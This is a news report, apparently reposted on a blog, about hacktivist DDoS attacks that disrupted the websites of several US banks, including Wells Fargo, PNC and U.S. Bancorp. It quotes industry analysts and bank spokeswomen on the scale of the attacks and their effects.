A spokeswoman for Wells Fargo said its site is back functioning normally.
"We appreciate our customers' patience and apologize for any inconvenience," she said.
The source of the attacks, which are flooding the websites with so much traffic that they become unavailable, are still not known, though a hacktivist group calling itself the "Mrt. Izz ad-Din al-Qassam Cyber Fighters" reportedly took credit in a Pastebin post, which since has been removed. It said it launched the attacks out of protest to the anti-Muslim film "Innocence of Muslims," which has helped spark outrage in the Middle East against the United States.
That's the same collective that took responsibility for a string of DDoS attacks last week against Bank of America.
Mike Smith, security evangelist at web services provider Akamai, said DDoS attacks that knock out access to popular commercial websites are not uncommon.
"This kind of stuff happens all the time," he told SCMagazine.com on Thursday "Usually people don't talk about them. Over the past couple of years, people have talked about them because the attackers' intent is to get publicity. That's where hacktivists come along. For them, it's free public relations."
Smith said it's also possible the latest DDoS attacks are the work of an organized crime group, or are being launched merely as a distraction and a way to slow the bank's response to actual fraud taking place. But this doesn't appear to be the case.
Either way, according to those who have studied this latest round of attacks, they are powerful.
"From what I've been told (I'm not a network security specialist) the leading DDoS prevention software more or less stops working when the attacks get larger than 60-70 gigabytes and simply can't handle the bandwidth of these 100-plus gigabyte attacks," Avivah Litan, vice president and distinguished analyst of Gartner, wrote in a blog post on Thursday. "The major ISPs only have a few hundred gigabytes bandwidth for all their customers, and even if they added more on to that, the hacktivists could quickly and easily eat the additional bandwidth up.
As of this writing, one of the attacks appears to be ongoing: The website for PNC Bank is not reachable.
"Our systems are performing well today," Nicole Garrison-Sprenger, a U.S. Bancorp spokeswoman, told SCMagazine.com. "The attacks yesterday caused intermittent delays for some consumers visiting our website, but we can assure customers that their data and funds are secure. These issues are related to unusual and coordinated high traffic volume designed to slow down the system -- similar to what other banks have experienced in the past week.
A spokeswoman for Wells Fargo said its site is back functioning normally.
"We appreciate our customers' patience and apologize for any inconvenience," she said.
Subscribe to:
Posts (Atom)